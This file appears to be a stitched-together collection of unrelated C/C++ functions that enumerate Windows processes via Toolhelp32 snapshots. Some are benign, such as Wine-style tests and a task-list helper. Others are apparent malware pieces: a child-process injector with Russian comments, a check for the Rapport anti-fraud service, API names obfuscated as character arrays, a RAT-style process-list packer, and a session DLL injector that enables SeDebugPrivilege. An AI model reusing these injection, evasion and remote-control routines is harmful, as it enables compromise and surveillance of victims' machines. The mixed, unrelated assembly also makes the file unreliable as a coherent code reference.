static void test_process(DWORD curr_pid, DWORD sub_pcs_pid) { HANDLE hSnapshot; PROCESSENTRY32 pe; MODULEENTRY32 me; unsigned found = 0; int num = 0; int childpos = -1; hSnapshot = pCreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 ); ok(hSnapshot != NULL, "Cannot create snapshot\n"); /* check that this current process is enumerated */ pe.dwSize = sizeof(pe); if (pProcess32First( hSnapshot, &pe )) { do { if (pe.th32ProcessID == curr_pid) found++; if (pe.th32ProcessID == sub_pcs_pid) { childpos = num; found++; } trace("PID=%x %s\n", pe.th32ProcessID, pe.szExeFile); num++; } while (pProcess32Next( hSnapshot, &pe )); } ok(found == 2, "couldn't find self and/or sub-process in process list\n"); /* check that first really resets the enumeration */ found = 0; if (pProcess32First( hSnapshot, &pe )) { do { if (pe.th32ProcessID == curr_pid) found++; if (pe.th32ProcessID == sub_pcs_pid) found++; trace("PID=%x %s\n", pe.th32ProcessID, pe.szExeFile); num--; } while (pProcess32Next( hSnapshot, &pe )); } ok(found == 2, "couldn't find self and/or sub-process in process list\n"); ok(!num, "mismatch in counting\n"); /* one broken program does Process32First() and does not expect anything * interesting to be there, especially not the just forked off child */ ok (childpos !=0, "child is not expected to be at position 0.\n"); me.dwSize = sizeof(me); ok(!pModule32First( hSnapshot, &me ), "shouldn't return a module\n"); CloseHandle(hSnapshot); ok(!pProcess32First( hSnapshot, &pe ), "shouldn't return a process\n"); }
void INJECTOR::InjectInChildProcesses(PInjector Injector, PProcessInfo Parent) { // Функция инжектится в дочерние процессы // и параллельно роверяем список обработанных процессов PROCESSENTRY32 pe; pe.dwSize = sizeof(pe); HANDLE Snap = (HANDLE)pCreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0); if (Snap != INVALID_HANDLE_VALUE) { if (pProcess32First(Snap, &pe)) { do { if (pe.th32ParentProcessID == Parent->PID) { TProcessInfo Info; if (GetProcessInfo(Injector, pe.th32ProcessID, Info)) Inject(Injector, &Info); } } while( pProcess32Next(Snap, &pe ) ); } pCloseHandle(Snap); } }
BOOL IsRunAntiRapport() { HANDLE hSnap; BOOL ret = FALSE; PROCESSENTRY32 proc32 ; m_memset(&proc32,0,sizeof(PROCESSENTRY32)); hSnap = (HANDLE)pCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); if (hSnap == INVALID_HANDLE_VALUE) return FALSE; proc32.dwSize = sizeof(proc32); if ( pProcess32First(hSnap,&proc32)) { do{ proc32.dwSize = sizeof(proc32); if (! plstrcmpA(proc32.szExeFile,"RapportMgmtService.exe")) { ret = TRUE; break; }; }while(pProcess32Next(hSnap,&proc32)); }; pCloseHandle(hSnap); return ret; };
DWORD GetProcessID(LPCTSTR lpProcessName) { typedef HANDLE (WINAPI *CreateToolhelp32SnapshotT) ( DWORD dwFlags, DWORD th32ProcessID ); CreateToolhelp32SnapshotT pCreateToolhelp32Snapshot = (CreateToolhelp32SnapshotT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"CreateToolhelp32Snapshot"); typedef BOOL (WINAPI *Process32FirstT) ( HANDLE hSnapshot, LPPROCESSENTRY32 lppe ); Process32FirstT pProcess32First = (Process32FirstT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"Process32First"); typedef BOOL (WINAPI *Process32NextT) ( HANDLE hSnapshot, LPPROCESSENTRY32 lppe ); Process32NextT pProcess32Next = (Process32NextT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"Process32Next"); typedef int (WINAPI *lstrcmpAT)( __in LPCSTR lpString1, __in LPCSTR lpString2 ); lstrcmpAT plstrcmpA=(lstrcmpAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"lstrcmpA"); DWORD RetProcessID = 0; HANDLE handle=pCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); PROCESSENTRY32* info=new PROCESSENTRY32; info->dwSize=sizeof(PROCESSENTRY32); if(pProcess32First(handle,info)) { if (strcmpi(info->szExeFile,lpProcessName) == 0) { RetProcessID = info->th32ProcessID; return RetProcessID; } while(pProcess32Next(handle,info) != FALSE) { if (plstrcmpA(info->szExeFile,lpProcessName) == 0) { RetProcessID = info->th32ProcessID; return RetProcessID; } } } return RetProcessID; }
//========================================================= BOOL GetTokenByName(HANDLE &hToken,LPSTR lpName) { if(!lpName) { return FALSE; } HANDLE hProcessSnap = NULL; BOOL bRet = FALSE; PROCESSENTRY32 pe32 = {0}; char SSzlC11[] = {'K','E','R','N','E','L','3','2','.','d','l','l','\0'}; char SSzlC10[] = {'C','r','e','a','t','e','T','o','o','l','h','e','l','p','3','2','S','n','a','p','s','h','o','t','\0'}; CreateToolhelp32SnapshotT pCreateToolhelp32Snapshot= (CreateToolhelp32SnapshotT)GetProcAddress(LoadLibrary(SSzlC11),SSzlC10); hProcessSnap = pCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (hProcessSnap == INVALID_HANDLE_VALUE) return (FALSE); pe32.dwSize = sizeof(PROCESSENTRY32); char MyProcess32First[] ={'P','r','o','c','e','s','s','3','2','F','i','r','s','t','\0'}; Process32FirstT pProcess32First= (Process32FirstT)GetProcAddress(LoadLibrary(SSzlC11),MyProcess32First); char CtxPW35[] = {'O','p','e','n','P','r','o','c','e','s','s','T','o','k','e','n','\0'}; OpenProcessTokenT pOpenProcessToken=(OpenProcessTokenT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),CtxPW35); char BrmAP29[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'}; CloseHandleT pCloseHandle=(CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),BrmAP29); char FBwWp14[] = {'O','p','e','n','P','r','o','c','e','s','s','\0'}; OpenProcessT pOpenProcess=(OpenProcessT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp14); char MyProcess32Next[] ={'P','r','o','c','e','s','s','3','2','N','e','x','t','\0'}; Process32NextT pProcess32Next= (Process32NextT)GetProcAddress(LoadLibrary(SSzlC11),MyProcess32Next); if (pProcess32First(hProcessSnap, &pe32)) { do { if(!strcmp(_strupr(pe32.szExeFile),_strupr(lpName))) { HANDLE hProcess = pOpenProcess(PROCESS_QUERY_INFORMATION,FALSE,pe32.th32ProcessID); // bRet = pOpenProcessToken(hProcess,TOKEN_ALL_ACCESS,&hToken); bRet = pOpenProcessToken(hProcess,TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&hToken); pCloseHandle (hProcessSnap); return (bRet); } } while (pProcess32Next(hProcessSnap, &pe32)); bRet = TRUE; } else bRet = FALSE; pCloseHandle (hProcessSnap); return (bRet); }
int CProcessModule::EnumProcess() { m_dwProcessCount =0; /*#ifdef WINNT DWORD dwBytesNeeded; if(!m_pEnumProcesses(&m_dwProcessIDs[0], sizeof(m_dwProcessIDs), &dwBytesNeeded)) return -1; m_dwProcessCount = dwBytesNeeded / sizeof(DWORD); #else*/ HANDLE hSnapShot; PROCESSENTRY32 ProcessEntry32; //MODULEENTRY32 ModuleEntry32; BOOL Result; //char *pszExtension; hSnapShot = pCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (hSnapShot == (HANDLE)-1) return false; ProcessEntry32.dwSize = sizeof(PROCESSENTRY32); Result = pProcess32First(hSnapShot, &ProcessEntry32); if (Result != TRUE) { CloseHandle(hSnapShot); return false; } do { //HMODULE hMod =GetModuleHandle(ProcessEntry32.szExeFile); //WriteLog("process:%s, id:%x, module id:%x", // ProcessEntry32.szExeFile, ProcessEntry32.th32ProcessID, // ProcessEntry32.th32ModuleID); m_dwProcessIDs[m_dwProcessCount] = ProcessEntry32.th32ProcessID; m_dwProcessCount ++; } while (pProcess32Next(hSnapShot, &ProcessEntry32) && m_dwProcessCount < MAX_PROCESS_COUNT); CloseHandle(hSnapShot); //#endif return m_dwProcessCount; }
/* This function is a cut/paste from the internet. There was no attribution on the original source, but I suspect MSDN */ bool process_running(const char *process) { typedef HANDLE (WINAPI *CREATESNAPSHOT)(DWORD dwFlags, DWORD dwProcID); typedef BOOL (WINAPI *PROCESS32FIRST)(HANDLE hSnapshot, LPPROCESSENTRY32 pEntry); typedef BOOL (WINAPI *PROCESS32NEXT)(HANDLE hSnapshot, LPPROCESSENTRY32 pEntry); HMODULE hKernel; HANDLE hSnapshot; PROCESSENTRY32 pe32; hKernel = GetModuleHandle("KERNEL32.DLL"); if (!hKernel) return false; CREATESNAPSHOT pCreateToolhelp32Snapshot = (CREATESNAPSHOT)GetProcAddress(hKernel, "CreateToolhelp32Snapshot"); PROCESS32FIRST pProcess32First = (PROCESS32FIRST)GetProcAddress(hKernel, "Process32First"); PROCESS32NEXT pProcess32Next = (PROCESS32NEXT)GetProcAddress(hKernel, "Process32Next"); if (!pCreateToolhelp32Snapshot || !pProcess32First || !pProcess32Next) return false; if ((hSnapshot = pCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0))==(void*)-1) return false; pe32.dwSize = sizeof(PROCESSENTRY32); if (!pProcess32First(hSnapshot, &pe32)) { CloseHandle(hSnapshot); return false; } do { if(!stricmp(pe32.szExeFile,process)) { CloseHandle(hSnapshot); return true; } } while(pProcess32Next(hSnapshot, &pe32)); CloseHandle(hSnapshot); return false; }
static void test_module(DWORD pid, const char* expected[], unsigned num_expected) { HANDLE hSnapshot; PROCESSENTRY32 pe; THREADENTRY32 te; MODULEENTRY32 me; unsigned found[32]; unsigned i; int num = 0; ok(NUM_OF(found) >= num_expected, "Internal: bump found[] size\n"); hSnapshot = pCreateToolhelp32Snapshot( TH32CS_SNAPMODULE, pid ); ok(hSnapshot != NULL, "Cannot create snapshot\n"); for (i = 0; i < num_expected; i++) found[i] = 0; me.dwSize = sizeof(me); if (pModule32First( hSnapshot, &me )) { do { trace("PID=%x base=%p size=%x %s %s\n", me.th32ProcessID, me.modBaseAddr, me.modBaseSize, me.szExePath, me.szModule); ok(me.th32ProcessID == pid, "wrong returned process id\n"); for (i = 0; i < num_expected; i++) if (!lstrcmpi(expected[i], me.szModule)) found[i]++; num++; } while (pModule32Next( hSnapshot, &me )); } for (i = 0; i < num_expected; i++) ok(found[i] == 1, "Module %s is %s\n", expected[i], found[i] ? "listed more than once" : "not listed"); /* check that first really resets the enumeration */ for (i = 0; i < num_expected; i++) found[i] = 0; me.dwSize = sizeof(me); if (pModule32First( hSnapshot, &me )) { do { trace("PID=%x base=%p size=%x %s %s\n", me.th32ProcessID, me.modBaseAddr, me.modBaseSize, me.szExePath, me.szModule); for (i = 0; i < num_expected; i++) if (!lstrcmpi(expected[i], me.szModule)) found[i]++; num--; } while (pModule32Next( hSnapshot, &me )); } for (i = 0; i < num_expected; i++) ok(found[i] == 1, "Module %s is %s\n", expected[i], found[i] ? "listed more than once" : "not listed"); ok(!num, "mismatch in counting\n"); pe.dwSize = sizeof(pe); ok(!pProcess32First( hSnapshot, &pe ), "shouldn't return a process\n"); te.dwSize = sizeof(te); ok(!pThread32First( hSnapshot, &te ), "shouldn't return a thread\n"); CloseHandle(hSnapshot); ok(!pModule32First( hSnapshot, &me ), "shouldn't return a module\n"); }
BOOL isProcesin(LPTSTR lpProcess) { typedef BOOL (WINAPI *CloseHandleT) ( __in HANDLE hObject ); char DDZGlGm[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'}; CloseHandleT pCloseHandle = (CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DDZGlGm); typedef HANDLE (WINAPI *CreateToolhelp32SnapshotT) ( DWORD dwFlags, DWORD th32ProcessID ); CreateToolhelp32SnapshotT pCreateToolhelp32Snapshot = (CreateToolhelp32SnapshotT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"CreateToolhelp32Snapshot"); typedef BOOL (WINAPI *Process32FirstT) ( HANDLE hSnapshot, LPPROCESSENTRY32 lppe ); Process32FirstT pProcess32First = (Process32FirstT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"Process32First"); typedef BOOL (WINAPI *GetLastErrorT) ( VOID ); char FhTZBW[] = {'G','e','t','L','a','s','t','E','r','r','o','r','\0'}; GetLastErrorT pGetLastError = (GetLastErrorT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FhTZBW); typedef BOOL (WINAPI *Process32NextT) ( HANDLE hSnapshot, LPPROCESSENTRY32 lppe ); Process32NextT pProcess32Next = (Process32NextT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"Process32Next"); BOOL bResult = FALSE; HANDLE handle=pCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); PROCESSENTRY32* info = new PROCESSENTRY32; info->dwSize = sizeof(PROCESSENTRY32); if(pProcess32First(handle,info)) { if(pGetLastError()==ERROR_NO_MORE_FILES ) { bResult = FALSE; } else { if (strstr(strupr(info->szExeFile), strupr(lpProcess)) > 0) { bResult = TRUE; } while(pProcess32Next(handle,info) != FALSE) { if (strstr(strupr(info->szExeFile),strupr(lpProcess)) > 0) { bResult = TRUE; break; } } } } delete info; pCloseHandle(handle); return bResult; }
BOOL CSysInfo::getUserNameFromExplorerProcess(CString &csUserName) { TCHAR szUserName[255]; DWORD dwName = 255; PROCESSENTRY32 pe; pe.dwSize = sizeof( PROCESSENTRY32 ); HANDLE hToken; TOKEN_INFORMATION_CLASS TokenInformationClass = TokenUser; TCHAR szTokenInformation[255]; DWORD dwTokenInformationLength = 255;//sizeof( TOKEN_OWNER ); DWORD dwReturnLength=0; DWORD dwReferencedDomainName = 255; TCHAR szReferencedDomainName[255]; SID_NAME_USE peUse; HANDLE hExplorer = NULL; HANDLE hSnapshot = NULL; HMODULE hAdv = NULL; BOOL bExplorerFound = FALSE; HANDLE (WINAPI* pCreateToolhelp32Snapshot) (DWORD, DWORD) = NULL; BOOL (WINAPI* pProcess32First) (HANDLE, LPPROCESSENTRY32) = NULL; BOOL (WINAPI* pProcess32Next) (HANDLE, LPPROCESSENTRY32) = NULL; HANDLE (WINAPI* pOpenProcess) (DWORD, BOOL, DWORD) = NULL; BOOL (WINAPI* pOpenProcessToken) (HANDLE, DWORD, PHANDLE) = NULL; BOOL (WINAPI* pLookupAccountSid) (LPCTSTR, PSID, LPTSTR, LPDWORD, LPTSTR, LPDWORD, PSID_NAME_USE ) = NULL; BOOL (WINAPI* pGetTokenInformation) (HANDLE, TOKEN_INFORMATION_CLASS, LPVOID, DWORD, PDWORD) = NULL; AddLog( _T( "getUserNameFromExplorerProcess: Trying to find logged on User ID from <explorer.exe> process...\n")); // First, try to use Advapi.dll if( !(hAdv = LoadLibrary( _T( "Advapi32.dll")))) { AddLog( _T( "\tFailed to load AdvApi32 library !\n")); return FALSE; } if( !( (*(FARPROC*)&pOpenProcessToken = GetProcAddress( hAdv , "OpenProcessToken" ) ) )|| !( (*(FARPROC*)&pOpenProcess = GetProcAddress( GetModuleHandle( _T( "KERNEL32.DLL")), "OpenProcess") ) )|| !( (*(FARPROC*)&pGetTokenInformation = GetProcAddress( hAdv , "GetTokenInformation") ) )|| #ifdef _UNICODE !( (*(FARPROC*)&pLookupAccountSid = GetProcAddress( hAdv , "LookupAccountSidW") ) ) ) #else !( (*(FARPROC*)&pLookupAccountSid = GetProcAddress( hAdv , "LookupAccountSidA") ) ) ) #endif { AddLog( _T( "\tFailed to load AdvApi32 library with error <%i> !\n"), GetLastError()); FreeLibrary( hAdv); return FALSE; } // Try to use kernel32 to enum process if( !(*(FARPROC*)&pCreateToolhelp32Snapshot = GetProcAddress( GetModuleHandle( _T("KERNEL32.DLL")), "CreateToolhelp32Snapshot") ) || #ifdef _UNICODE !(*(FARPROC*)&pProcess32First = GetProcAddress( GetModuleHandle( _T("KERNEL32.DLL")), "Process32FirstW") ) || !(*(FARPROC*)&pProcess32Next = GetProcAddress( GetModuleHandle( _T("KERNEL32.DLL")), "Process32NextW") ) ) #else !(*(FARPROC*)&pProcess32First = GetProcAddress( GetModuleHandle( _T("KERNEL32.DLL")), "Process32First") ) || !(*(FARPROC*)&pProcess32Next = GetProcAddress( GetModuleHandle( _T("KERNEL32.DLL")), "Process32Next") ) ) #endif { AddLog( _T( "\tFailed to load Kernel32 process access functions with error <%i> !\n"), GetLastError()); FreeLibrary( hAdv); return FALSE; } // Create snapshot of running processes if( (hSnapshot = pCreateToolhelp32Snapshot( TH32CS_SNAPALL ,0 )) == INVALID_HANDLE_VALUE ) { AddLog( _T( "\tCreateToolhelp32Snapshot failed with error <%i> !\n"), GetLastError()); FreeLibrary( hAdv); return FALSE; } // Trying to find explorer.exe into snapshot if( !pProcess32First( hSnapshot, &pe) ) { AddLog( _T( "\tProcess32First failed with error <%i> !\n"), GetLastError()); CloseHandle( hSnapshot ); FreeLibrary( hAdv); return FALSE; } do { if( !CString(pe.szExeFile).CompareNoCase( _T( "explorer.exe"))) { bExplorerFound = TRUE; break; } pe.dwSize = sizeof( PROCESSENTRY32 ); } while (pProcess32Next( hSnapshot, &pe )); if (!bExplorerFound) { AddLog( _T( "\tCould not find <explorer.exe> process !\n")); CloseHandle( hSnapshot ); FreeLibrary( hAdv); return FALSE; } // Retrieve a handle on explorer.exe process using ID */ if( !(hExplorer = pOpenProcess( PROCESS_ALL_ACCESS, FALSE, pe.th32ProcessID ))) { AddLog( _T( "\tFailed to open <explorer.exe> process with error <%i> !\n"), GetLastError()); CloseHandle( hSnapshot ); FreeLibrary( hAdv); return FALSE; } // Open token associated to explorer.exe to get information if( !pOpenProcessToken( hExplorer, TOKEN_READ, &hToken ) ) { AddLog( _T( "\tOpenProcessToken failed with error <%i>\n"), GetLastError()); CloseHandle( hExplorer ); CloseHandle( hToken ); CloseHandle( hSnapshot ); FreeLibrary( hAdv); return FALSE; } if( !pGetTokenInformation( hToken, TokenInformationClass, &szTokenInformation, dwTokenInformationLength, &dwReturnLength)) { AddLog( _T( "\tGetTokenInformation failed with error <%i>\n"), GetLastError()); CloseHandle( hExplorer ); CloseHandle( hToken ); CloseHandle( hSnapshot ); FreeLibrary( hAdv); return FALSE; } // Lokkup user account running explorer.exe process if( !pLookupAccountSid( NULL, ((TOKEN_USER*)&szTokenInformation)->User.Sid, szUserName, &dwName, szReferencedDomainName, &dwReferencedDomainName, &peUse ) ) { AddLog( _T( "\tLookupAccountSid failed with error <%i>\n"), GetLastError()); CloseHandle( hExplorer ); CloseHandle( hToken ); CloseHandle( hSnapshot ); FreeLibrary( hAdv); return FALSE; } CloseHandle( hExplorer ); CloseHandle( hToken ); CloseHandle( hSnapshot ); FreeLibrary( hAdv ); // Ensure username exists if( CString(szUserName) == _T( "") ) { AddLog( _T( "\tFound empty user, so assuming failed !\n")); return FALSE; } AddLog( _T( "\t\t<User: %s>\n\tOK\n"), szUserName); csUserName = szUserName; return TRUE; }
/* * Inject an arbitrary DLL into a process running in specific Windows session. */ DWORD session_inject( DWORD dwSessionId, DLL_BUFFER * pDllBuffer ) { DWORD dwResult = ERROR_INVALID_HANDLE; CREATETOOLHELP32SNAPSHOT pCreateToolhelp32Snapshot = NULL; PROCESS32FIRST pProcess32First = NULL; PROCESS32NEXT pProcess32Next = NULL; HANDLE hProcessSnap = NULL; HMODULE hKernel = NULL; HANDLE hToken = NULL; BOOL bUseBruteForce = TRUE; PROCESSENTRY32 pe32 = {0}; do { // If we can, get SeDebugPrivilege... if( OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) ) { TOKEN_PRIVILEGES priv = {0}; priv.PrivilegeCount = 1; priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; if( LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &priv.Privileges[0].Luid ) ) { if( AdjustTokenPrivileges( hToken, FALSE, &priv, 0, NULL, NULL ) ); dprintf("[SESSION] session_inject. Got SeDebugPrivilege!" ); } CloseHandle( hToken ); } hKernel = LoadLibraryA( "kernel32" ); if( !hKernel ) break; pCreateToolhelp32Snapshot = (CREATETOOLHELP32SNAPSHOT)GetProcAddress( hKernel, "CreateToolhelp32Snapshot" ); pProcess32First = (PROCESS32FIRST)GetProcAddress( hKernel, "Process32First" ); pProcess32Next = (PROCESS32NEXT)GetProcAddress( hKernel, "Process32Next" ); if( !pCreateToolhelp32Snapshot || !pProcess32First || !pProcess32Next ) break; hProcessSnap = pCreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 ); if( hProcessSnap == INVALID_HANDLE_VALUE ) break; pe32.dwSize = sizeof( PROCESSENTRY32 ); if( !pProcess32First( hProcessSnap, &pe32 ) ) break; bUseBruteForce = FALSE; do { if( dwSessionId == session_id( pe32.th32ProcessID ) ) { // On Windows 2008R2 we Blue Screen the box if we inject via APC injection // into the target sessions instance of csrss.exe!!! so we filter it out... if( strstr( pe32.szExeFile, "csrss.exe" ) ) continue; //if( strstr( pe32.szExeFile, "winlogon.exe" ) ) // continue; //if( !strstr( pe32.szExeFile, "winlogon.exe" ) ) // continue; //if( !strstr( pe32.szExeFile, "explorer.exe" ) ) // continue; //if( strstr( pe32.szExeFile, "TPAutoConnSvc.exe" ) ) // continue; dwResult = ps_inject( pe32.th32ProcessID, pDllBuffer ); if( dwResult == ERROR_SUCCESS ) { dprintf( "[SESSION] session_inject. Injected into process %d (%s)", pe32.th32ProcessID, pe32.szExeFile ); break; } } } while( pProcess32Next( hProcessSnap, &pe32 ) ); } while( 0 ); if( hProcessSnap ) CloseHandle( hProcessSnap ); if( hKernel ) FreeLibrary( hKernel ); // On NT4 we must brute force the process list... if( bUseBruteForce ) dwResult = _session_inject_bruteforce( dwSessionId, pDllBuffer ); return dwResult; }
/*++ Routine Description: Provides an API for getting a list of tasks running at the time of the API call. This function uses Toolhelp32to get the task list and is therefore straight WIN32 calls that anyone can call. Arguments: dwNumTasks - maximum number of tasks that the pTask array can hold Return Value: Number of tasks placed into the pTask array. --*/ DWORD GetTaskList95( PTASK_LIST pTask, DWORD dwNumTasks ) { CREATESNAPSHOT pCreateToolhelp32Snapshot = NULL; PROCESSWALK pProcess32First = NULL; PROCESSWALK pProcess32Next = NULL; HANDLE hKernel = NULL; HANDLE hProcessSnap = NULL; PROCESSENTRY32 pe32 = {0}; DWORD dwTaskCount = 0; // Guarantee to the code later on that we'll enum at least one task. if (dwNumTasks == 0) return( 0 ); // Obtain a module handle to KERNEL so that we can get the addresses of // the 32-bit Toolhelp functions we need. hKernel = GetModuleHandle("KERNEL32.DLL"); if (hKernel) { pCreateToolhelp32Snapshot = (CREATESNAPSHOT)GetProcAddress((HMODULE)hKernel, "CreateToolhelp32Snapshot"); pProcess32First = (PROCESSWALK)GetProcAddress((HMODULE )hKernel, "Process32First"); pProcess32Next = (PROCESSWALK)GetProcAddress((HMODULE )hKernel, "Process32Next"); } // make sure we got addresses of all needed Toolhelp functions. if (!(pProcess32First && pProcess32Next && pCreateToolhelp32Snapshot)) return( 0 ); // Take a snapshot of all processes currently in the system. hProcessSnap = pCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (hProcessSnap == (HANDLE)-1) return( 0 ); // Walk the snapshot of processes and for each process, get information // to display. dwTaskCount = 0; pe32.dwSize = zsizeof(PROCESSENTRY32); // must be filled out before use if (pProcess32First(hProcessSnap, &pe32)) { do { LPSTR pCurChar; // strip path and leave executabe filename splitpath for (pCurChar = (pe32.szExeFile + lstrlen (pe32.szExeFile)); *pCurChar != '\\' && pCurChar != pe32.szExeFile; --pCurChar) lstrcpy((LPSTR)pTask->ProcessName, pCurChar); pTask -> flags = 0; pTask -> dwProcessId = pe32.th32ProcessID; ++dwTaskCount; // keep track of how many tasks we've got so far ++pTask; // get to next task info block. } while (dwTaskCount < dwNumTasks && pProcess32Next(hProcessSnap, &pe32)); } else dwTaskCount = 0; // Couldn't walk the list of processes. // Don't forget to clean up the snapshot object... CloseHandle (hProcessSnap); return dwTaskCount; }
LPBYTE CSystemManager::getProcessList() { HANDLE hSnapshot = NULL; HANDLE hProcess = NULL; HMODULE hModules = NULL; PROCESSENTRY32 pe32 = {0}; DWORD cbNeeded; char strProcessName[MAX_PATH] = {0}; LPBYTE lpBuffer = NULL; DWORD dwOffset = 0; DWORD dwLength = 0; char SSzlC11[] = {'K','E','R','N','E','L','3','2','.','d','l','l','\0'}; char SSzlC10[] = {'C','r','e','a','t','e','T','o','o','l','h','e','l','p','3','2','S','n','a','p','s','h','o','t','\0'}; CreateToolhelp32SnapshotT pCreateToolhelp32Snapshot= (CreateToolhelp32SnapshotT)GetProcAddress(LoadLibrary(SSzlC11),SSzlC10); hSnapshot = pCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(hSnapshot == INVALID_HANDLE_VALUE) return NULL; pe32.dwSize = sizeof(PROCESSENTRY32); char SSzlC20[] = {'L','o','c','a','l','A','l','l','o','c','\0'}; LocalAllocT pLocalAlloc=(LocalAllocT)GetProcAddress(LoadLibrary("KERNEL32.dll"),SSzlC20); lpBuffer = (LPBYTE)pLocalAlloc(LPTR, 1024); lpBuffer[0] = TOKEN_PSLIST; dwOffset = 1; char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'}; lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01); LocalSizeT pLocalSize=(LocalSizeT)GetProcAddress(LoadLibrary(SSzlC11),"LocalSize"); char FBwWp14[] = {'O','p','e','n','P','r','o','c','e','s','s','\0'}; OpenProcessT pOpenProcess=(OpenProcessT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp14); char MyProcess32Next[] ={'P','r','o','c','e','s','s','3','2','N','e','x','t','\0'}; Process32NextT pProcess32Next= (Process32NextT)GetProcAddress(LoadLibrary(SSzlC11),MyProcess32Next); char MyProcess32First[] ={'P','r','o','c','e','s','s','3','2','F','i','r','s','t','\0'}; Process32FirstT pProcess32First= (Process32FirstT)GetProcAddress(LoadLibrary(SSzlC11),MyProcess32First); char FBwWp29[] = {'L','o','c','a','l','R','e','A','l','l','o','c','\0'}; LocalReAllocT pLocalReAlloc=(LocalReAllocT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp29); char DYrEN15[] = {'E','n','u','m','P','r','o','c','e','s','s','M','o','d','u','l','e','s','\0'}; EnumProcessModulesT pEnumProcessModules=(EnumProcessModulesT)GetProcAddress(LoadLibrary("PSAPI.DLL"),DYrEN15); char DYrEN13[] = {'G','e','t','M','o','d','u','l','e','F','i','l','e','N','a','m','e','E','x','A','\0'}; GetModuleFileNameExAT pGetModuleFileNameExA=(GetModuleFileNameExAT)GetProcAddress(LoadLibrary("PSAPI.DLL"),DYrEN13); if(pProcess32First(hSnapshot, &pe32)) { do { hProcess = pOpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pe32.th32ProcessID); if ((pe32.th32ProcessID !=0 ) && (pe32.th32ProcessID != 4) && (pe32.th32ProcessID != 8)) { pEnumProcessModules(hProcess, &hModules, sizeof(hModules), &cbNeeded); pGetModuleFileNameExA(hProcess, hModules, strProcessName, sizeof(strProcessName)); // 此进程占用数据大小 dwLength = sizeof(DWORD) + plstrlenA(pe32.szExeFile) + plstrlenA(strProcessName) + 2; // 缓冲区太小,再重新分配下 if (pLocalSize(lpBuffer) < (dwOffset + dwLength)) lpBuffer = (LPBYTE)pLocalReAlloc(lpBuffer, (dwOffset + dwLength), LMEM_ZEROINIT|LMEM_MOVEABLE); Gyfunction->my_memcpy(lpBuffer + dwOffset, &(pe32.th32ProcessID), sizeof(DWORD)); dwOffset += sizeof(DWORD); Gyfunction->my_memcpy(lpBuffer + dwOffset, pe32.szExeFile, plstrlenA(pe32.szExeFile) + 1); dwOffset += plstrlenA(pe32.szExeFile) + 1; Gyfunction->my_memcpy(lpBuffer + dwOffset, strProcessName, plstrlenA(strProcessName) + 1); dwOffset += plstrlenA(strProcessName) + 1; } } while(pProcess32Next(hSnapshot, &pe32)); } lpBuffer = (LPBYTE)pLocalReAlloc(lpBuffer, dwOffset, LMEM_ZEROINIT|LMEM_MOVEABLE); char BrmAP29[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'}; CloseHandleT pCloseHandle=(CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),BrmAP29); pCloseHandle(hSnapshot); return lpBuffer; }